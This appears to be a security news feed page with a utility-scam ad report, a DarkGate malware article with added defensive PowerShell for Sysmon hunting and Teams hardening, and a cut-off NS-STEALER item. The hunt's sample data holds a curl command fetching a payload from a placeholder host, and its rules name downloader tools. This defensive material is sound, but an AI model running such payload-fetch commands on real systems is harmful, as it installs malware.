Utility scams update
Back in February, we reported on malicious ads related to utility bills (electricity, gas) that direct victims to call centers where scammers will collect their identity and try to extort money from them.
A few months later, we checked and were able to find as many Google ads as before, following very much the same pattern. In addition, we can see that miscreants are trying to legitimize their operations by creating fake U.S.-based entities.
Utility-based ads targeting mobile phones
It only took us 15 minutes to find about a dozen fraudulent ads on Google related to utility bills. This campaign is targeting mobile devices only, as far as we can tell, and U.S. residents. All the ads seen below belong to different advertisers based in Pakistan.
Some of those advertiser accounts have a fairly large footprint with several hundred ads.
Most often, the ad is not associated with a landing page (although a URL is displayed); instead clicking on the ad will bring up the phone number and prompt you to dial. Having said that, the domains used belong to the scammers and are often fairly new.
We also saw several ads that at first appear somewhat legitimate. They are registered to advertisers based in the US and their websites look almost authentic. But when you start checking the details, you realize some things don’t add up, such as an address that leads to an apartment complex.
Consumer protection
The Federal Trade Commission (FTC) has an article about utility scams; however, the technique described there involves scammers calling victims, rather than the other way around. For good reason, many people won't answer the phone when it shows an unknown number, since it is likely yet another telemarketer. Certainly, some victims will answer the phone, but the scam is much more effective when you are the one who initiates the call.
We have reported the fraudulent advertiser accounts to Google while we are also adding related domains to our blocklist. Remember to be extremely vigilant before calling anyone, especially if that number came from an advertisement. If in doubt, go directly to your utility company’s website using a computer and then look for a form or phone number that you can verify before dialing.
Hackers Abusing Skype and Teams to Deliver the DarkGate Malware
Hackers used the Skype and Microsoft Teams messaging platforms to deliver the DarkGate malware to targeted businesses. The message carries a Visual Basic loader script; once the victim runs it, the script fetches and installs DarkGate.
DarkGate is Windows-based malware capable of remote access to target endpoints, file encryption, cryptocurrency mining, and credential theft. It was first documented in 2018.
According to Trend Micro, DarkGate attacks were seen most often in the Americas, followed closely by Asia, the Middle East, and Africa.
Distribution of the DarkGate campaign
To deploy and run its malicious capabilities, DarkGate also relies on AutoIt, a legitimate automation and scripting tool for Windows. Other malware families commonly abuse AutoIt for the same reasons: it helps evade defenses and adds an extra layer of obfuscation around the real payload.
DarkGate Infection Chain Abusing Skype
In the Skype case, the attacker used a compromised Skype account to post into an existing conversation thread, sending a message with an attachment that was named to look like a PDF file but was actually a malicious VBS script.
“The threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script”, researchers said.
Infection Chain
Because the message arrived from a known contact's account, the recipient treated the sender as a trusted external party and opened the attachment. Researchers observed that the script then used the curl command to retrieve the legitimate AutoIt application along with the associated malicious files.
Hackers Abusing Microsoft Teams Platform
In another instance, the threat arrived as a link in a Microsoft Teams message. The victim was exposed because the organization's Teams configuration allowed external users to message its staff, so a sender from an unknown tenant could reach them directly.
Teams message with a malicious attachment
In the Teams variant, the attackers hid a .LNK file inside the attachment, and the sample came from an unidentified external sender.
“The downloaded artifacts contained both legitimate copy of AutoIt and a maliciously compiled AutoIt script file that contained the malicious capabilities of DarkGate,” researchers said.
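Both the Skype and the Teams chains above end the same way: a user-facing messaging client launches a script host, the script pulls down curl or another downloader, and a copy of AutoIt is run from a user-writable directory. The PowerShell below is an added example and is not code from the original article or from Trend Micro's report. It hunts a constructed set of Sysmon Event ID 1 (process creation) records for that pattern; the records themselves, the user names, and the address 203.0.113.10 are made up for this example, and only the field names (Image, ParentImage, CommandLine) follow Sysmon's ProcessCreate schema.

```powershell
# Added example, not from the original article: hunt Sysmon process-creation
# records for the DarkGate delivery chain (chat client -> script host -> curl
# -> AutoIt). The events below are constructed for this example.
$sampleEvents = @(
    [pscustomobject]@{ Image       = 'C:\Windows\System32\wscript.exe'
                       ParentImage = 'C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.0\Skype.exe'
                       CommandLine = 'wscript.exe C:\Users\alice\Downloads\Invoice_2023.pdf.vbs' }
    [pscustomobject]@{ Image       = 'C:\Windows\System32\curl.exe'
                       ParentImage = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'curl.exe -o C:\Users\alice\AppData\Local\Temp\AutoIt3.exe http://203.0.113.10/AutoIt3.exe' }
    [pscustomobject]@{ Image       = 'C:\Users\alice\AppData\Local\Temp\AutoIt3.exe'
                       ParentImage = 'C:\Windows\System32\wscript.exe'
                       CommandLine = 'AutoIt3.exe C:\Users\alice\AppData\Local\Temp\script.au3' }
    [pscustomobject]@{ Image       = 'C:\Windows\System32\cmd.exe'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'cmd.exe /c start C:\Users\bob\Downloads\Report.pdf.lnk' }
    [pscustomobject]@{ Image       = 'C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE'
                       ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = 'WINWORD.EXE /n C:\Users\alice\Documents\report.docx' }
)

function Find-DarkGateIndicators {
    param([Parameter(Mandatory)][object[]]$Events)

    $scriptHosts  = 'wscript.exe', 'cscript.exe', 'mshta.exe'
    $downloaders  = 'curl.exe', 'certutil.exe', 'bitsadmin.exe'
    $chatClients  = 'skype.exe', 'teams.exe', 'ms-teams.exe'
    # A document-looking name with a second, executable extension behind it
    $doubleExt    = '\.(pdf|docx?|xlsx?)\.(vbs|vbe|js|jse|lnk|exe|bat|cmd)(\s|$)'
    # Locations an ordinary user can write to without elevation
    $userWritable = '\\Users\\[^\\]+\\(AppData|Downloads|Desktop)\\|\\ProgramData\\'

    foreach ($e in $Events) {
        # Compare on the file name only; -match and -contains are case-insensitive
        $image  = ($e.Image -split '[\\/]')[-1].ToLower()
        $parent = ($e.ParentImage -split '[\\/]')[-1].ToLower()
        $hits   = @()

        if ($e.CommandLine -match $doubleExt) { $hits += 'double-extension lure' }
        if ($chatClients -contains $parent -and $scriptHosts -contains $image) { $hits += 'chat client spawned script host' }
        if ($scriptHosts -contains $parent -and $downloaders -contains $image) { $hits += 'script host spawned downloader' }
        if (($image -eq 'autoit3.exe' -or $e.CommandLine -match '\.au3(\s|$)') -and $e.Image -match $userWritable) {
            $hits += 'AutoIt run from user-writable path'
        }

        foreach ($h in $hits) {
            [pscustomobject]@{ Rule = $h; Image = $image; Parent = $parent; CommandLine = $e.CommandLine }
        }
    }
}

# The Word launch in the last record produces no hit; the other four do.
Find-DarkGateIndicators -Events $sampleEvents | Format-Table -AutoSize
```

On a real host, replace $sampleEvents with records pulled from the Sysmon operational log (for example via Get-WinEvent on Microsoft-Windows-Sysmon/Operational, selecting Event ID 1 and mapping the Image, ParentImage and CommandLine fields). The rules are deliberately narrow: a renamed AutoIt binary or a downloader other than curl would need additional conditions, so treat this as a starting point for a hunt rather than a complete detection.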
Recommendation
Cybercriminals may use these payloads to deliver further malware, such as cryptocurrency miners, information stealers, ransomware, and malicious or abused remote management tools.
Organizations should keep control over instant messaging applications so that policies such as blocking external domains, restricting attachments, and, where practical, scanning incoming files can be enforced.
Multifactor authentication (MFA) is strongly advised for these applications so that an attack does not spread further when legitimate credentials are compromised, as they were for the Skype account abused here.
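The recommendations above map onto concrete Microsoft 365 settings. The PowerShell below is an added example and is not from the original article: it shows the permissive Teams external-access posture that let an unknown external sender reach the victim, next to a restricted one, using the MicrosoftTeams module's tenant federation cmdlets, and then enables Defender for Office 365 Safe Attachments scanning for files shared through Teams via Exchange Online PowerShell. The domain partner.example is a placeholder for a real business partner's tenant, and the Safe Attachments step assumes a Defender for Office 365 licence.

```powershell
# Added example, not from the original article. Requires the MicrosoftTeams
# module and a Teams administrator role; partner.example is a placeholder.
Connect-MicrosoftTeams

# Weak posture: any Microsoft 365 tenant, any Skype consumer account and any
# Teams personal account can open a chat with your users and send them files.
Get-CsTenantFederationConfiguration |
    Select-Object AllowFederatedUsers, AllowPublicUsers, AllowTeamsConsumer,
                  AllowTeamsConsumerInbound, AllowedDomains, BlockedDomains

# Restricted posture: keep federation only for an explicit allow-list of
# partner tenants and switch off consumer (Skype / Teams personal) traffic.
Set-CsTenantFederationConfiguration `
    -AllowFederatedUsers $true `
    -AllowedDomainsAsAList @('partner.example') `
    -AllowPublicUsers $false `
    -AllowTeamsConsumer $false `
    -AllowTeamsConsumerInbound $false

# Scanning: detonate files shared in Teams, SharePoint and OneDrive with Safe
# Attachments (Exchange Online PowerShell, Defender for Office 365 licence).
Connect-ExchangeOnline
Set-AtpPolicyForO365 -EnableATPForSPOTeamsODB $true
```

Changes to tenant federation can take some time to propagate, and an allow-list breaks chats with any partner not on it, so agree the list with the business before cutting over. Safe Attachments blocks a file flagged as malicious from being opened or downloaded but does not remove it, so pair it with the host-level hunting described earlier.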
The post Hackers Abusing Skype and Teams to Deliver the DarkGate Malware appeared first on Cyber Security News.
NS-STEALER Uses Discord Bots to Exfiltrate Your Secrets from Popular Browsers
Cybersecurity researchers have discovered a new Java-based "sophisticated" information stealer that uses a Discord bot to exfiltrate sensitive data from compromised hosts.
The malware, named NS-STEALER, is propagated via ZIP archives masquerading as cracked software, Trellix security researcher Gurumoorthi Ramanathan said in an analysis published last week.
The ZIP file contains
The Hacker News | #1 Trusted Cybersecurity News Site